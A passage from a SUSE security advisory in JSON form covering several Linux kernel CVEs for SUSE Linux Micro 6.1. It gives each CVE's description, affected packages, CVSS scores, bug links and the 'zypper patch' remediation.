"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68775",
"url": "https://www.suse.com/security/cve/CVE-2025-68775"
},
{
"category": "external",
"summary": "SUSE Bug 1256665 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "external",
"summary": "SUSE Bug 1256666 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256666"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68776"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68776",
"url": "https://www.suse.com/security/cve/CVE-2025-68776"
},
{
"category": "external",
"summary": "SUSE Bug 1256659 for CVE-2025-68776",
"url": "https://bugzilla.suse.com/1256659"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68777",
"url": "https://www.suse.com/security/cve/CVE-2025-68777"
},
{
"category": "external",
"summary": "SUSE Bug 1256655 for CVE-2025-68777",
"url": "https://bugzilla.suse.com/1256655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68783",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68783"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68783",
"url": "https://www.suse.com/security/cve/CVE-2025-68783"
},
{
"category": "external",
"summary": "SUSE Bug 1256650 for CVE-2025-68783",
"url": "https://bugzilla.suse.com/1256650"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68788"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68788",
"url": "https://www.suse.com/security/cve/CVE-2025-68788"
},
{
"category": "external",
"summary": "SUSE Bug 1256638 for CVE-2025-68788",
"url": "https://bugzilla.suse.com/1256638"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
